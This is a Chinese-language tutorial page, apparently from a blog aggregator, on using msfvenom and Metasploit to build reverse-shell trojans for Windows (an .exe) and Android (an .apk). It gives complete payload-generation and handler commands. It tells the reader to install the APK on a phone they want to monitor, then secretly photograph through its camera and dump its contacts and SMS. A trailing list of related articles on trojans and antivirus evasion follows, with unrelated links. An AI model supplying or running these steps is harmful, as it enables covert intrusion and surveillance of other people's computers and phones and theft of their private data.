简介

msfvenom

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件

查看所有--payload的模块

msfvenom -l payloads

文件后缀名-f的格式

msfvenom --help-formats

metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

生成的木马是前端的话,那么这个就是后端

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe

启动metasploit

输入命令:

msfconsole

metasploit侦听

msf > use exploit/multi/handler     #加载模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #设置payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost kali的ip #设置kali的ip
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211 #设置kali的端口
lport => 1211
msf exploit(multi/handler) > exploit #执行
[*] Started reverse TCP handler on 222.222.221.140:1211

将生成的shell上传至windows主机中并运行

提示有返回即可控制对方电脑,如同操作linux服务器一样

使用

? - 帮助菜单

download -下载文件/文件夹

msfvenom的apk在android中的使用

msfvenom生成shell.apk

ifconfig查看kali的ip,ip为222.222.221.140

输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小

启动metasploit

输入命令:

msfconsole

启动msfconsole

metasploit配置及监听

在控制台中输入

use exploit/multi/handler   //加载模块

set payload android/meterpreter/reverse_tcp   //选择Payload

show options   //查看参数设置

这里需要设置LHOST的ip地址,也就是你的kali的ip地址

还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)

set LHOST 192.168.1.114   //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)

set LPORT 5555   //这里的端口设置成刚才我们生成木马所监听的端口

exploit   //开始执行漏洞 开始监听,等待手机上线

接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了

使用

然后可以输入sysinfo 查看手机信息

webcam_list 查看手机有多少个摄像头 这里显示是2个

webcam_stream  //开启摄像头

webcam_snap //隐秘拍照功能

dump_contacts //导出电话号码

dump_sms  //导出信息

导出的文件拍的照片都会在root下面

可以输入?查看更多命令

参考:https://blog.csdn.net/langtuteng17/article/details/80444115

metasploit、msfvenom生成木马入侵电脑及手机的更多相关文章

  1. 转: kali msfvenom生成木马

    kali msfvenom生成木马 转:https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,m ...

  2. Kali环境使用Metasploit生成木马入侵安卓手机

    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计, ...

  3. Metasploit生成木马入侵安卓手机

    开始 首先你需要一个Metasploit(废话) Linux: sudo apt install metasploit-framework Termux: 看这里 指令 sudo su //生成木马文 ...

  4. 9.利用msfvenom生成木马

    这篇文章来介绍一下msf中一个生成木马的msfvenom模块. msfvenom命令行选项如下: 英文原版: 中文版: Options: -p, --payload <payload> 指 ...

  5. 使用msfvenom生成木马

    msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& #03 ...

  6. 使用Kali中的Metasploit生成木马控制Windows系统 (第九天 9.20)

    本文转自:https://www.cnblogs.com/yankaohaitaiwei/p/11556921.html 一.kali及Metasploit kali基于debin的数字取证系统,上面 ...

  7. 使用Kali中的Metasploit生成木马控制Windows系统

    一.概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack). 其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使 ...

  8. 使用MSF生成木马_入侵Windows

    1>生成木马 (123.exe)        -f 输出格式 -o 输出地址 2>启动msfconsole 3>进行设置&&启动攻击 4>木马运行&后 ...

  9. Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...

随机推荐

  1. 计算电脑所能表示的最大最小值(c++)

    C++当中获得现在计算机上所能表示的各种类型(比如int,long int,short int,double,float等)最大最小有两种方法,一种是使用c++预先定义的宏,对于有些编译器可能需要包含 ...

  2. [C++] 浅拷贝和深拷贝

    浅拷贝只是简单的值拷贝: 深拷贝需要重新分配空间. 系统默认的拷贝构造函数属于浅拷贝. #include <iostream> using namespace std; class A { ...

  3. 基于Hadoop爬虫网易云歌曲评论

    作业要求来自于:https://edu.cnblogs.com/campus/gzcc/GZCC-16SE2/homework/3339 本次选取的是爬取歌曲<大碗宽面>的歌评数据 1.将 ...

  4. -bash: /bin/grep: Argument list too long和 find: Arguments to -type should contain only one letter报错处理

    由于要查找的文件太多 过滤成只找具体时间一天以内的文件 | 查找最近30分钟修改的当前目录下的.php文件 查找最近24小时修改的当前目录下的.php文件 查找最近24小时修改的当前目录下的.php文 ...

  5. python pycharm错误集锦

    url:http://www.cnblogs.com/hinimix/p/8016859.html 1, this list creation could be rewritten as a list ...

  6. C# 获取文件扩展信息-应用名称/作者等

    方案一:使用微乳封装的Shell包 添加nuget包:Microsoft.WindowsAPICodePack.Shell using Microsoft.WindowsAPICodePack.She ...

  7. np.concatenate

  8. openresty开发系列35--openresty执行流程之5内容content阶段

    openresty开发系列35--openresty执行流程之5内容content阶段 content 阶段 ---init阶段---重写赋值---重写rewrite---access content ...

  9. 【Linux】使用 walle + docker-compose 部署上线单获取不到分支的解决办法

    背景: 使用walle+docker 自动化部署项目.在新建上线单时候拉取不到分支,并提示有错误.但是没有错误信息 错误排查: 首先确保远程仓库已添加宿主机公钥,且一定先在宿主机手动连接一下远程仓库, ...

  10. django-rest-framework 使用例子

    Start Your API 创建项目 startproject rest_api 创建APP startapp task 配置 rest_api/settings.py INSTALLED_APPS ...